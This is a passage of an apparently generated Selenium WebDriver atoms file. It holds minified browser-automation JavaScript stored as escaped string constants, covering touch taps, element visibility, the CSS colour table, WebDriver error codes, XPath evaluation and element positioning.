"urn this};function Xb(a){var b;if(\"none\"!=P(a,\"display\"))b=gb(a);el"\
"se{b=a.style;var c=b.display,d=b.visibility,e=b.position;b.visibility="\
"\"hidden\";b.position=\"absolute\";b.display=\"inline\";var f=gb(a);b.d"\
"isplay=c;b.position=e;b.visibility=d;b=f}return 0<b.width&&0<b.height||"\
"!a.offsetParent?b:Xb(a.offsetParent)};function Yb(a,b,c){if(!ib(a,!0))t"\
"hrow new t(11,\"Element is not currently visible and may not be manipul"\
"ated\");var d=w(a).body,e;e=eb(a);var f=eb(d),h,q,n,A;A=O(d,\"borderLef"\
"tWidth\");n=O(d,\"borderRightWidth\");h=O(d,\"borderTopWidth\");q=O(d,"\
"\"borderBottomWidth\");h=new bb(parseFloat(h),parseFloat(n),parseFloat("\
"q),parseFloat(A));q=e.x-f.x-h.left;e=e.y-f.y-h.top;f=d.clientHeight-a.o"\
"ffsetHeight;h=d.scrollLeft;n=d.scrollTop;h+=Math.min(q,Math.max(q-(d.cl"\
"ientWidth-a.offsetWidth),0));n+=Math.min(e,Math.max(e-\nf,0));e=new v(h"\
",n);d.scrollLeft=e.x;d.scrollTop=e.y;b?b=new Wb(b.x,b.y):(b=Xb(a),b=new"\
" Wb(b.width/2,b.height/2));c=c||new Ub;c.move(a,b);if(c.d())throw new t"\
"(13,\"Cannot press touchscreen when already pressed.\");c.w=!1;c.q=c.U+"\
"+;Vb(c,Db);if(!c.d())throw new t(13,\"Cannot release touchscreen when n"\
"ot already pressed.\");Vb(c,Kb);if(!c.w){c.k(Jb,c.j,0);if(c.k(Ab,c.j,0)"\
"&&(a=c.f||c.c,b=La(w(a)),a!=b)){if(b&&p(b.blur)&&!Q(b,\"BODY\"))try{b.b"\
"lur()}catch(wa){throw wa;}p(a.focus)&&a.focus()}if(c.f&&hb(c.c)&&(a=\nc"\
".f,b=lb(c.c),!b||a.multiple)){c.c.selected=!b;if(b=a.multiple){b=0;d=St"\
"ring($a).replace(/^[\\s\\xa0]+|[\\s\\xa0]+$/g,\"\").split(\".\");e=\"28"\
"\".replace(/^[\\s\\xa0]+|[\\s\\xa0]+$/g,\"\").split(\".\");f=Math.max(d"\
".length,e.length);for(q=0;0==b&&q<f;q++){h=d[q]||\"\";n=e[q]||\"\";A=Re"\
"gExp(\"(\\\\d*)(\\\\D*)\",\"g\");var Nb=RegExp(\"(\\\\d*)(\\\\D*)\",\"g"\
"\");do{var F=A.exec(h)||[\"\",\"\",\"\"],G=Nb.exec(n)||[\"\",\"\",\"\"]"\
";if(0==F[0].length&&0==G[0].length)break;b=((0==F[1].length?0:parseInt("\
"F[1],10))<(0==G[1].length?0:parseInt(G[1],10))?-1:(0==\nF[1].length?0:p"\
"arseInt(F[1],10))>(0==G[1].length?0:parseInt(G[1],10))?1:0)||((0==F[2]."\
"length)<(0==G[2].length)?-1:(0==F[2].length)>(0==G[2].length)?1:0)||(F["\
"2]<G[2]?-1:F[2]>G[2]?1:0)}while(0==b)}b=!(0<=b)}b||Fb(a,Ib)}c.k(Cb,c.j,"\
"0);a=c.j;hb(c.c)&&(!c.f&&kb(c.c)&&lb(c.c),c.k(zb,a,0,null,0,!1,void 0))"\
"}Bb={};c.q=0;c.C=0;c.M=!1}var Zb=[\"_\"],$=k;Zb[0]in $||!$.execScript||"\
"$.execScript(\"var \"+Zb[0]);for(var $b;Zb.length&&($b=Zb.shift());)Zb."\
"length||void 0===Yb?$=$[$b]?$[$b]:$[$b]={}:$[$b]=Yb;; return this._.app"\
"ly(null,arguments);}.apply({navigator:typeof window!=undefined?window.n"\
"avigator:null,document:typeof window!=undefined?window.document:null}, "\
"arguments);}"
CLEAR = \
"function(){return function(){function f(a){return function(){return thi"\
"s[a]}}function k(a){return function(){return a}}var l=this;\nfunction a"\
"a(a){var b=typeof a;if(\"object\"==b)if(a){if(a instanceof Array)return"\
"\"array\";if(a instanceof Object)return b;var c=Object.prototype.toStri"\
"ng.call(a);if(\"[object Window]\"==c)return\"object\";if(\"[object Arra"\
"y]\"==c||\"number\"==typeof a.length&&\"undefined\"!=typeof a.splice&&"\
"\"undefined\"!=typeof a.propertyIsEnumerable&&!a.propertyIsEnumerable("\
"\"splice\"))return\"array\";if(\"[object Function]\"==c||\"undefined\"!"\
"=typeof a.call&&\"undefined\"!=typeof a.propertyIsEnumerable&&!a.proper"\
"tyIsEnumerable(\"call\"))return\"function\"}else return\"null\";\nelse "\
"if(\"function\"==b&&\"undefined\"==typeof a.call)return\"object\";retur"\
"n b}function m(a){return\"string\"==typeof a}function n(a){return\"func"\
"tion\"==aa(a)}function ba(a,b){function c(){}c.prototype=b.prototype;a."\
"da=b.prototype;a.prototype=new c};var ca=window;function da(a){return S"\
"tring(a).replace(/\\-([a-z])/g,function(a,c){return c.toUpperCase()})};"\
"var ea=Array.prototype;function p(a,b){for(var c=a.length,d=m(a)?a.spli"\
"t(\"\"):a,e=0;e<c;e++)e in d&&b.call(void 0,d[e],e,a)}function fa(a,b){"\
"if(a.reduce)return a.reduce(b,\"\");var c=\"\";p(a,function(d,e){c=b.ca"\
"ll(void 0,c,d,e,a)});return c}function ga(a,b){for(var c=a.length,d=m(a"\
")?a.split(\"\"):a,e=0;e<c;e++)if(e in d&&b.call(void 0,d[e],e,a))return"\
"!0;return!1}\nfunction q(a,b){var c;a:if(m(a))c=m(b)&&1==b.length?a.ind"\
"exOf(b,0):-1;else{for(c=0;c<a.length;c++)if(c in a&&a[c]===b)break a;c="\
"-1}return 0<=c}function ha(a,b,c){return 2>=arguments.length?ea.slice.c"\
"all(a,b):ea.slice.call(a,b,c)};var ia={aliceblue:\"#f0f8ff\",antiquewhi"\
"te:\"#faebd7\",aqua:\"#00ffff\",aquamarine:\"#7fffd4\",azure:\"#f0ffff"\
"\",beige:\"#f5f5dc\",bisque:\"#ffe4c4\",black:\"#000000\",blanchedalmon"\
"d:\"#ffebcd\",blue:\"#0000ff\",blueviolet:\"#8a2be2\",brown:\"#a52a2a\""\
",burlywood:\"#deb887\",cadetblue:\"#5f9ea0\",chartreuse:\"#7fff00\",cho"\
"colate:\"#d2691e\",coral:\"#ff7f50\",cornflowerblue:\"#6495ed\",cornsil"\
"k:\"#fff8dc\",crimson:\"#dc143c\",cyan:\"#00ffff\",darkblue:\"#00008b\""\
",darkcyan:\"#008b8b\",darkgoldenrod:\"#b8860b\",darkgray:\"#a9a9a9\",da"\
"rkgreen:\"#006400\",\ndarkgrey:\"#a9a9a9\",darkkhaki:\"#bdb76b\",darkma"\
"genta:\"#8b008b\",darkolivegreen:\"#556b2f\",darkorange:\"#ff8c00\",dar"\
"korchid:\"#9932cc\",darkred:\"#8b0000\",darksalmon:\"#e9967a\",darkseag"\
"reen:\"#8fbc8f\",darkslateblue:\"#483d8b\",darkslategray:\"#2f4f4f\",da"\
"rkslategrey:\"#2f4f4f\",darkturquoise:\"#00ced1\",darkviolet:\"#9400d3"\
"\",deeppink:\"#ff1493\",deepskyblue:\"#00bfff\",dimgray:\"#696969\",dim"\
"grey:\"#696969\",dodgerblue:\"#1e90ff\",firebrick:\"#b22222\",floralwhi"\
"te:\"#fffaf0\",forestgreen:\"#228b22\",fuchsia:\"#ff00ff\",gainsboro:\""\
"#dcdcdc\",\nghostwhite:\"#f8f8ff\",gold:\"#ffd700\",goldenrod:\"#daa520"\
"\",gray:\"#808080\",green:\"#008000\",greenyellow:\"#adff2f\",grey:\"#8"\
"08080\",honeydew:\"#f0fff0\",hotpink:\"#ff69b4\",indianred:\"#cd5c5c\","\
"indigo:\"#4b0082\",ivory:\"#fffff0\",khaki:\"#f0e68c\",lavender:\"#e6e6"\
"fa\",lavenderblush:\"#fff0f5\",lawngreen:\"#7cfc00\",lemonchiffon:\"#ff"\
"facd\",lightblue:\"#add8e6\",lightcoral:\"#f08080\",lightcyan:\"#e0ffff"\
"\",lightgoldenrodyellow:\"#fafad2\",lightgray:\"#d3d3d3\",lightgreen:\""\
"#90ee90\",lightgrey:\"#d3d3d3\",lightpink:\"#ffb6c1\",lightsalmon:\"#ff"\
"a07a\",\nlightseagreen:\"#20b2aa\",lightskyblue:\"#87cefa\",lightslateg"\
"ray:\"#778899\",lightslategrey:\"#778899\",lightsteelblue:\"#b0c4de\",l"\
"ightyellow:\"#ffffe0\",lime:\"#00ff00\",limegreen:\"#32cd32\",linen:\"#"\
"faf0e6\",magenta:\"#ff00ff\",maroon:\"#800000\",mediumaquamarine:\"#66c"\
"daa\",mediumblue:\"#0000cd\",mediumorchid:\"#ba55d3\",mediumpurple:\"#9"\
"370db\",mediumseagreen:\"#3cb371\",mediumslateblue:\"#7b68ee\",mediumsp"\
"ringgreen:\"#00fa9a\",mediumturquoise:\"#48d1cc\",mediumvioletred:\"#c7"\
"1585\",midnightblue:\"#191970\",mintcream:\"#f5fffa\",mistyrose:\"#ffe4"\
"e1\",\nmoccasin:\"#ffe4b5\",navajowhite:\"#ffdead\",navy:\"#000080\",ol"\
"dlace:\"#fdf5e6\",olive:\"#808000\",olivedrab:\"#6b8e23\",orange:\"#ffa"\
"500\",orangered:\"#ff4500\",orchid:\"#da70d6\",palegoldenrod:\"#eee8aa"\
"\",palegreen:\"#98fb98\",paleturquoise:\"#afeeee\",palevioletred:\"#db7"\
"093\",papayawhip:\"#ffefd5\",peachpuff:\"#ffdab9\",peru:\"#cd853f\",pin"\
"k:\"#ffc0cb\",plum:\"#dda0dd\",powderblue:\"#b0e0e6\",purple:\"#800080"\
"\",red:\"#ff0000\",rosybrown:\"#bc8f8f\",royalblue:\"#4169e1\",saddlebr"\
"own:\"#8b4513\",salmon:\"#fa8072\",sandybrown:\"#f4a460\",seagreen:\"#2"\
"e8b57\",\nseashell:\"#fff5ee\",sienna:\"#a0522d\",silver:\"#c0c0c0\",sk"\
"yblue:\"#87ceeb\",slateblue:\"#6a5acd\",slategray:\"#708090\",slategrey"\
":\"#708090\",snow:\"#fffafa\",springgreen:\"#00ff7f\",steelblue:\"#4682"\
"b4\",tan:\"#d2b48c\",teal:\"#008080\",thistle:\"#d8bfd8\",tomato:\"#ff6"\
"347\",turquoise:\"#40e0d0\",violet:\"#ee82ee\",wheat:\"#f5deb3\",white:"\
"\"#ffffff\",whitesmoke:\"#f5f5f5\",yellow:\"#ffff00\",yellowgreen:\"#9a"\
"cd32\"};var ja=\"background-color border-top-color border-right-color b"\
"order-bottom-color border-left-color color outline-color\".split(\" \")"\
",ka=/#([0-9a-fA-F])([0-9a-fA-F])([0-9a-fA-F])/;function la(a){if(!ma.te"\
"st(a))throw Error(\"'\"+a+\"' is not a valid hex color\");4==a.length&&"\
"(a=a.replace(ka,\"#$1$1$2$2$3$3\"));return a.toLowerCase()}var ma=/^#(?"\
":[0-9a-f]{3}){1,2}$/i,na=/^(?:rgba)?\\((\\d{1,3}),\\s?(\\d{1,3}),\\s?("\
"\\d{1,3}),\\s?(0|1|0\\.\\d*)\\)$/i;\nfunction oa(a){var b=a.match(na);i"\
"f(b){a=Number(b[1]);var c=Number(b[2]),d=Number(b[3]),b=Number(b[4]);if"\
"(0<=a&&255>=a&&0<=c&&255>=c&&0<=d&&255>=d&&0<=b&&1>=b)return[a,c,d,b]}r"\
"eturn[]}var pa=/^(?:rgb)?\\((0|[1-9]\\d{0,2}),\\s?(0|[1-9]\\d{0,2}),\\s"\
"?(0|[1-9]\\d{0,2})\\)$/i;function qa(a){var b=a.match(pa);if(b){a=Numbe"\
"r(b[1]);var c=Number(b[2]),b=Number(b[3]);if(0<=a&&255>=a&&0<=c&&255>=c"\
"&&0<=b&&255>=b)return[a,c,b]}return[]};function r(a,b){this.code=a;this"\
".state=ra[a]||sa;this.message=b||\"\";var c=this.state.replace(/((?:^|"\
"\\s+)[a-z])/g,function(a){return a.toUpperCase().replace(/^[\\s\\xa0]+/"\
"g,\"\")}),d=c.length-5;if(0>d||c.indexOf(\"Error\",d)!=d)c+=\"Error\";t"\
"his.name=c;c=Error(this.message);c.name=this.name;this.stack=c.stack||"\
"\"\"}ba(r,Error);\nvar sa=\"unknown error\",ra={15:\"element not select"\
"able\",11:\"element not visible\",31:\"ime engine activation failed\",3"\
"0:\"ime not available\",24:\"invalid cookie domain\",29:\"invalid eleme"\
"nt coordinates\",12:\"invalid element state\",32:\"invalid selector\",5"\
"1:\"invalid selector\",52:\"invalid selector\",17:\"javascript error\","\
"405:\"unsupported operation\",34:\"move target out of bounds\",27:\"no "\
"such alert\",7:\"no such element\",8:\"no such frame\",23:\"no such win"\
"dow\",28:\"script timeout\",33:\"session not created\",10:\"stale eleme"\
"nt reference\",\n0:\"success\",21:\"timeout\",25:\"unable to set cookie"\
"\",26:\"unexpected alert open\"};ra[13]=sa;ra[9]=\"unknown command\";r."\
"prototype.toString=function(){return this.name+\": \"+this.message};var"\
" t,u,v,ta=l.navigator;v=ta&&ta.platform||\"\";t=-1!=v.indexOf(\"Mac\");"\
"u=-1!=v.indexOf(\"Win\");var w=-1!=v.indexOf(\"Linux\");var x;function "\
"y(a,b){this.x=void 0!==a?a:0;this.y=void 0!==b?b:0}y.prototype.toString"\
"=function(){return\"(\"+this.x+\", \"+this.y+\")\"};y.prototype.ceil=fu"\
"nction(){this.x=Math.ceil(this.x);this.y=Math.ceil(this.y);return this}"\
";y.prototype.floor=function(){this.x=Math.floor(this.x);this.y=Math.flo"\
"or(this.y);return this};y.prototype.round=function(){this.x=Math.round("\
"this.x);this.y=Math.round(this.y);return this};function A(a,b){this.wid"\
"th=a;this.height=b}A.prototype.toString=function(){return\"(\"+this.wid"\
"th+\" x \"+this.height+\")\"};A.prototype.ceil=function(){this.width=Ma"\
"th.ceil(this.width);this.height=Math.ceil(this.height);return this};A.p"\
"rototype.floor=function(){this.width=Math.floor(this.width);this.height"\
"=Math.floor(this.height);return this};A.prototype.round=function(){this"\
".width=Math.round(this.width);this.height=Math.round(this.height);retur"\
"n this};var ua=3;function va(a){for(;a&&1!=a.nodeType;)a=a.previousSibl"\
"ing;return a}function wa(a,b){if(a.contains&&1==b.nodeType)return a==b|"\
"|a.contains(b);if(\"undefined\"!=typeof a.compareDocumentPosition)retur"\
"n a==b||Boolean(a.compareDocumentPosition(b)&16);for(;b&&a!=b;)b=b.pare"\
"ntNode;return b==a}\nfunction xa(a,b){if(a==b)return 0;if(a.compareDocu"\
"mentPosition)return a.compareDocumentPosition(b)&2?1:-1;if(\"sourceInde"\
"x\"in a||a.parentNode&&\"sourceIndex\"in a.parentNode){var c=1==a.nodeT"\
"ype,d=1==b.nodeType;if(c&&d)return a.sourceIndex-b.sourceIndex;var e=a."\
"parentNode,g=b.parentNode;return e==g?ya(a,b):!c&&wa(e,b)?-1*za(a,b):!d"\
"&&wa(g,a)?za(b,a):(c?a.sourceIndex:e.sourceIndex)-(d?b.sourceIndex:g.so"\
"urceIndex)}d=B(a);c=d.createRange();c.selectNode(a);c.collapse(!0);d=d."\
"createRange();d.selectNode(b);\nd.collapse(!0);return c.compareBoundary"\
"Points(l.Range.START_TO_END,d)}function za(a,b){var c=a.parentNode;if(c"\
"==b)return-1;for(var d=b;d.parentNode!=c;)d=d.parentNode;return ya(d,a)"\
"}function ya(a,b){for(var c=b;c=c.previousSibling;)if(c==a)return-1;ret"\
"urn 1}function B(a){return 9==a.nodeType?a:a.ownerDocument||a.document}"\
"function Aa(a,b,c){c||(a=a.parentNode);for(c=0;a;){if(b(a))return a;a=a"\
".parentNode;c++}return null}function Ba(a){try{return a&&a.activeElemen"\
"t}catch(b){}return null}\nfunction C(a){this.I=a||l.document||document}"\
"function Ca(a){var b=a.I;a=b.body;b=b.parentWindow||b.defaultView;retur"\
"n new y(b.pageXOffset||a.scrollLeft,b.pageYOffset||a.scrollTop)}C.proto"\
"type.contains=wa;function D(a){var b=null,c=a.nodeType;1==c&&(b=a.textC"\
"ontent,b=void 0==b||null==b?a.innerText:b,b=void 0==b||null==b?\"\":b);"\
"if(\"string\"!=typeof b)if(9==c||1==c){a=9==c?a.documentElement:a.first"\
"Child;for(var c=0,d=[],b=\"\";a;){do 1!=a.nodeType&&(b+=a.nodeValue),d["\
"c++]=a;while(a=a.firstChild);for(;c&&!(a=d[--c].nextSibling););}}else b"\
"=a.nodeValue;return\"\"+b}\nfunction E(a,b,c){if(null===b)return!0;try{"\
"if(!a.getAttribute)return!1}catch(d){return!1}return null==c?!!a.getAtt"\
"ribute(b):a.getAttribute(b,2)==c}function F(a,b,c,d,e){return Da.call(n"\
"ull,a,b,m(c)?c:null,m(d)?d:null,e||new H)}\nfunction Da(a,b,c,d,e){b.ge"\
"tElementsByName&&d&&\"name\"==c?(b=b.getElementsByName(d),p(b,function("\
"b){a.matches(b)&&e.add(b)})):b.getElementsByClassName&&d&&\"class\"==c?"\
"(b=b.getElementsByClassName(d),p(b,function(b){b.className==d&&a.matche"\
"s(b)&&e.add(b)})):b.getElementsByTagName&&(b=b.getElementsByTagName(a.g"\
"etName()),p(b,function(a){E(a,c,d)&&e.add(a)}));return e}function Ea(a,"\
"b,c,d,e){for(b=b.firstChild;b;b=b.nextSibling)E(b,c,d)&&a.matches(b)&&e"\
".add(b);return e};function H(){this.g=this.f=null;this.n=0}function Fa("\
"a){this.v=a;this.next=this.p=null}H.prototype.unshift=function(a){a=new"\
" Fa(a);a.next=this.f;this.g?this.f.p=a:this.f=this.g=a;this.f=a;this.n+"\
"+};H.prototype.add=function(a){a=new Fa(a);a.p=this.g;this.f?this.g.nex"\
"t=a:this.f=this.g=a;this.g=a;this.n++};function Ga(a){return(a=a.f)?a.v"\
":null}function I(a){return new Ha(a,!1)}function Ha(a,b){this.Z=a;this."\
"r=(this.w=b)?a.g:a.f;this.K=null}\nHa.prototype.next=function(){var a=t"\
"his.r;if(null==a)return null;var b=this.K=a;this.r=this.w?a.p:a.next;re"\
"turn b.v};function J(a,b,c,d,e){b=b.evaluate(d);c=c.evaluate(d);var g;i"\
"f(b instanceof H&&c instanceof H){e=I(b);for(d=e.next();d;d=e.next())fo"\
"r(b=I(c),g=b.next();g;g=b.next())if(a(D(d),D(g)))return!0;return!1}if(b"\
" instanceof H||c instanceof H){b instanceof H?e=b:(e=c,c=b);e=I(e);b=ty"\
"peof c;for(d=e.next();d;d=e.next()){switch(b){case \"number\":d=+D(d);b"\
"reak;case \"boolean\":d=!!D(d);break;case \"string\":d=D(d);break;defau"\
"lt:throw Error(\"Illegal primitive type for comparison.\");}if(a(d,c))r"\
"eturn!0}return!1}return e?\n\"boolean\"==typeof b||\"boolean\"==typeof "\
"c?a(!!b,!!c):\"number\"==typeof b||\"number\"==typeof c?a(+b,+c):a(b,c)"\
":a(+b,+c)}function Ia(a,b,c,d){this.L=a;this.aa=b;this.H=c;this.k=d}Ia."\
"prototype.toString=f(\"L\");var Ja={};function K(a,b,c,d){if(a in Ja)th"\
"row Error(\"Binary operator already created: \"+a);a=new Ia(a,b,c,d);Ja"\
"[a.toString()]=a}K(\"div\",6,1,function(a,b,c){return a.d(c)/b.d(c)});K"\
"(\"mod\",6,1,function(a,b,c){return a.d(c)%b.d(c)});K(\"*\",6,1,functio"\
"n(a,b,c){return a.d(c)*b.d(c)});\nK(\"+\",5,1,function(a,b,c){return a."\
"d(c)+b.d(c)});K(\"-\",5,1,function(a,b,c){return a.d(c)-b.d(c)});K(\"<"\
"\",4,2,function(a,b,c){return J(function(a,b){return a<b},a,b,c)});K(\""\
">\",4,2,function(a,b,c){return J(function(a,b){return a>b},a,b,c)});K("\
"\"<=\",4,2,function(a,b,c){return J(function(a,b){return a<=b},a,b,c)})"\
";K(\">=\",4,2,function(a,b,c){return J(function(a,b){return a>=b},a,b,c"\
")});K(\"=\",3,2,function(a,b,c){return J(function(a,b){return a==b},a,b"\
",c,!0)});\nK(\"!=\",3,2,function(a,b,c){return J(function(a,b){return a"\
"!=b},a,b,c,!0)});K(\"and\",2,2,function(a,b,c){return a.j(c)&&b.j(c)});"\
"K(\"or\",1,2,function(a,b,c){return a.j(c)||b.j(c)});function Ka(a,b,c,"\
"d,e,g,h,z,s){this.o=a;this.H=b;this.Y=c;this.X=d;this.W=e;this.k=g;this"\
".U=h;this.T=void 0!==z?z:h;this.$=!!s}Ka.prototype.toString=f(\"o\");va"\
"r La={};function L(a,b,c,d,e,g,h,z){if(a in La)throw Error(\"Function a"\
"lready created: \"+a+\".\");La[a]=new Ka(a,b,c,d,!1,e,g,h,z)}L(\"boolea"\
"n\",2,!1,!1,function(a,b){return b.j(a)},1);L(\"ceiling\",1,!1,!1,funct"\
"ion(a,b){return Math.ceil(b.d(a))},1);\nL(\"concat\",3,!1,!1,function(a"\
",b){var c=ha(arguments,1);return fa(c,function(b,c){return b+c.c(a)})},"\
"2,null);L(\"contains\",2,!1,!1,function(a,b,c){b=b.c(a);a=c.c(a);return"\
"-1!=b.indexOf(a)},2);L(\"count\",1,!1,!1,function(a,b){return b.evaluat"\
"e(a).n},1,1,!0);L(\"false\",2,!1,!1,k(!1),0);L(\"floor\",1,!1,!1,functi"\
"on(a,b){return Math.floor(b.d(a))},1);\nL(\"id\",4,!1,!1,function(a,b){"\
"var c=a.h(),d=9==c.nodeType?c:c.ownerDocument,c=b.c(a).split(/\\s+/),e="\
"[];p(c,function(a){(a=d.getElementById(a))&&!q(e,a)&&e.push(a)});e.sort"\
"(xa);var g=new H;p(e,function(a){g.add(a)});return g},1);L(\"lang\",2,!"\
"1,!1,k(!1),1);L(\"last\",1,!0,!1,function(a){if(1!=arguments.length)thr"\
"ow Error(\"Function last expects ()\");return a.Q()},0);L(\"local-name"\
"\",3,!1,!0,function(a,b){var c=b?Ga(b.evaluate(a)):a.h();return c?c.nod"\
"eName.toLowerCase():\"\"},0,1,!0);\nL(\"name\",3,!1,!0,function(a,b){va"\
"r c=b?Ga(b.evaluate(a)):a.h();return c?c.nodeName.toLowerCase():\"\"},0"\
",1,!0);L(\"namespace-uri\",3,!0,!1,k(\"\"),0,1,!0);L(\"normalize-space"\
"\",3,!1,!0,function(a,b){return(b?b.c(a):D(a.h())).replace(/[\\s\\xa0]+"\
"/g,\" \").replace(/^\\s+|\\s+$/g,\"\")},0,1);L(\"not\",2,!1,!1,function"\
"(a,b){return!b.j(a)},1);L(\"number\",1,!1,!0,function(a,b){return b?b.d"\
"(a):+D(a.h())},0,1);L(\"position\",1,!0,!1,function(a){return a.R()},0)"\
";L(\"round\",1,!1,!1,function(a,b){return Math.round(b.d(a))},1);\nL(\""\
"starts-with\",2,!1,!1,function(a,b,c){b=b.c(a);a=c.c(a);return 0==b.las"\
"tIndexOf(a,0)},2);L(\"string\",3,!1,!0,function(a,b){return b?b.c(a):D("\
"a.h())},0,1);L(\"string-length\",1,!1,!0,function(a,b){return(b?b.c(a):"\
"D(a.h())).length},0,1);\nL(\"substring\",3,!1,!1,function(a,b,c,d){c=c."\
"d(a);if(isNaN(c)||Infinity==c||-Infinity==c)return\"\";d=d?d.d(a):Infin"\
"ity;if(isNaN(d)||-Infinity===d)return\"\";c=Math.round(c)-1;var e=Math."\
"max(c,0);a=b.c(a);if(Infinity==d)return a.substring(e);b=Math.round(d);"\
"return a.substring(e,c+b)},2,3);L(\"substring-after\",3,!1,!1,function("\
"a,b,c){b=b.c(a);a=c.c(a);c=b.indexOf(a);return-1==c?\"\":b.substring(c+"\
"a.length)},2);\nL(\"substring-before\",3,!1,!1,function(a,b,c){b=b.c(a)"\
";a=c.c(a);a=b.indexOf(a);return-1==a?\"\":b.substring(0,a)},2);L(\"sum"\
"\",1,!1,!1,function(a,b){for(var c=I(b.evaluate(a)),d=0,e=c.next();e;e="\
"c.next())d+=+D(e);return d},1,1,!0);L(\"translate\",3,!1,!1,function(a,"\
"b,c,d){b=b.c(a);c=c.c(a);var e=d.c(a);a=[];for(d=0;d<c.length;d++){var "\
"g=c.charAt(d);g in a||(a[g]=e.charAt(d))}c=\"\";for(d=0;d<b.length;d++)"\
"g=b.charAt(d),c+=g in a?a[g]:g;return c},3);L(\"true\",2,!1,!1,k(!0),0)"\
";function Ma(a,b,c,d){this.o=a;this.P=b;this.w=c;this.ea=d}Ma.prototype"\
".toString=f(\"o\");var Na={};function M(a,b,c,d){if(a in Na)throw Error"\
"(\"Axis already created: \"+a);Na[a]=new Ma(a,b,c,!!d)}M(\"ancestor\",f"\
"unction(a,b){for(var c=new H,d=b;d=d.parentNode;)a.matches(d)&&c.unshif"\
"t(d);return c},!0);M(\"ancestor-or-self\",function(a,b){var c=new H,d=b"\
";do a.matches(d)&&c.unshift(d);while(d=d.parentNode);return c},!0);\nM("\
"\"attribute\",function(a,b){var c=new H,d=a.getName(),e=b.attributes;if"\
"(e)if(\"*\"==d)for(var d=0,g;g=e[d];d++)c.add(g);else(g=e.getNamedItem("\
"d))&&c.add(g);return c},!1);M(\"child\",function(a,b,c,d,e){return Ea.c"\
"all(null,a,b,m(c)?c:null,m(d)?d:null,e||new H)},!1,!0);M(\"descendant\""\
",F,!1,!0);M(\"descendant-or-self\",function(a,b,c,d){var e=new H;E(b,c,"\
"d)&&a.matches(b)&&e.add(b);return F(a,b,c,d,e)},!1,!0);\nM(\"following"\
"\",function(a,b,c,d){var e=new H;do for(var g=b;g=g.nextSibling;)E(g,c,"\
"d)&&a.matches(g)&&e.add(g),e=F(a,g,c,d,e);while(b=b.parentNode);return "\
"e},!1,!0);M(\"following-sibling\",function(a,b){for(var c=new H,d=b;d=d"\
".nextSibling;)a.matches(d)&&c.add(d);return c},!1);M(\"namespace\",func"\
"tion(){return new H},!1);M(\"parent\",function(a,b){var c=new H;if(9==b"\
".nodeType)return c;if(2==b.nodeType)return c.add(b.ownerElement),c;var "\
"d=b.parentNode;a.matches(d)&&c.add(d);return c},!1);\nM(\"preceding\",f"\
"unction(a,b,c,d){var e=new H,g=[];do g.unshift(b);while(b=b.parentNode)"\
";for(var h=1,z=g.length;h<z;h++){var s=[];for(b=g[h];b=b.previousSiblin"\
"g;)s.unshift(b);for(var G=0,fb=s.length;G<fb;G++)b=s[G],E(b,c,d)&&a.mat"\
"ches(b)&&e.add(b),e=F(a,b,c,d,e)}return e},!0,!0);M(\"preceding-sibling"\
"\",function(a,b){for(var c=new H,d=b;d=d.previousSibling;)a.matches(d)&"\
"&c.unshift(d);return c},!0);M(\"self\",function(a,b){var c=new H;a.matc"\
"hes(b)&&c.add(b);return c},!1);var N={};N.C=function(){var a={fa:\"http"\
"://www.w3.org/2000/svg\"};return function(b){return a[b]||null}}();N.k="\
"function(a,b,c){var d=B(a);try{var e=d.createNSResolver?d.createNSResol"\
"ver(d.documentElement):N.C;return d.evaluate(b,a,e,c,null)}catch(g){thr"\
"ow new r(32,\"Unable to locate an element with the xpath expression \"+"\
"b+\" because of the following error:\\n\"+g);}};\nN.q=function(a,b){if("\
"!a||1!=a.nodeType)throw new r(32,'The result of the xpath expression \""\
"'+b+'\" is: '+a+\". It should be an element.\");};N.M=function(a,b){var"\
" c=function(){var c=N.k(b,a,9);return c?c.singleNodeValue||null:b.selec"\
"tSingleNode?(c=B(b),c.setProperty&&c.setProperty(\"SelectionLanguage\","\
"\"XPath\"),b.selectSingleNode(a)):null}();null===c||N.q(c,a);return c};"\
"\nN.S=function(a,b){var c=function(){var c=N.k(b,a,7);if(c){for(var e=c"\
".snapshotLength,g=[],h=0;h<e;++h)g.push(c.snapshotItem(h));return g}ret"\
"urn b.selectNodes?(c=B(b),c.setProperty&&c.setProperty(\"SelectionLangu"\
"age\",\"XPath\"),b.selectNodes(a)):[]}();p(c,function(b){N.q(b,a)});ret"\
"urn c};function O(a,b,c,d){this.left=a;this.top=b;this.width=c;this.hei"\
"ght=d}O.prototype.toString=function(){return\"(\"+this.left+\", \"+this"\
".top+\" - \"+this.width+\"w x \"+this.height+\"h)\"};O.prototype.contai"\
"ns=function(a){return a instanceof O?this.left<=a.left&&this.left+this."\
"width>=a.left+a.width&&this.top<=a.top&&this.top+this.height>=a.top+a.h"\
"eight:a.x>=this.left&&a.x<=this.left+this.width&&a.y>=this.top&&a.y<=th"\
"is.top+this.height};\nO.prototype.ceil=function(){this.left=Math.ceil(t"\
"his.left);this.top=Math.ceil(this.top);this.width=Math.ceil(this.width)"\
";this.height=Math.ceil(this.height);return this};O.prototype.floor=func"\
"tion(){this.left=Math.floor(this.left);this.top=Math.floor(this.top);th"\
"is.width=Math.floor(this.width);this.height=Math.floor(this.height);ret"\
"urn this};\nO.prototype.round=function(){this.left=Math.round(this.left"\
");this.top=Math.round(this.top);this.width=Math.round(this.width);this."\
"height=Math.round(this.height);return this};function Oa(a,b){var c=B(a)"\
";return c.defaultView&&c.defaultView.getComputedStyle&&(c=c.defaultView"\
".getComputedStyle(a,null))?c[b]||c.getPropertyValue(b)||\"\":\"\"}funct"\
"ion P(a){return Oa(a,\"position\")||(a.currentStyle?a.currentStyle.posi"\
"tion:null)||a.style&&a.style.position}function Pa(a){var b;try{b=a.getB"\
"oundingClientRect()}catch(c){return{left:0,top:0,right:0,bottom:0}}retu"\
"rn b}\nfunction Qa(a){var b=B(a),c=P(a),d=\"fixed\"==c||\"absolute\"==c"\
";for(a=a.parentNode;a&&a!=b;a=a.parentNode)if(c=P(a),d=d&&\"static\"==c"\
"&&a!=b.documentElement&&a!=b.body,!d&&(a.scrollWidth>a.clientWidth||a.s"\
"crollHeight>a.clientHeight||\"fixed\"==c||\"absolute\"==c||\"relative\""\
"==c))return a;return null}\nfunction Ra(a){if(1==a.nodeType){var b;if(a"\
".getBoundingClientRect)b=Pa(a),b=new y(b.left,b.top);else{b=Ca(a?new C("\
"B(a)):x||(x=new C));var c=B(a),d=P(a),e=new y(0,0),g=(c?B(c):document)."\
"documentElement;if(a!=g)if(a.getBoundingClientRect)a=Pa(a),c=Ca(c?new C"\
"(B(c)):x||(x=new C)),e.x=a.left+c.x,e.y=a.top+c.y;else if(c.getBoxObjec"\
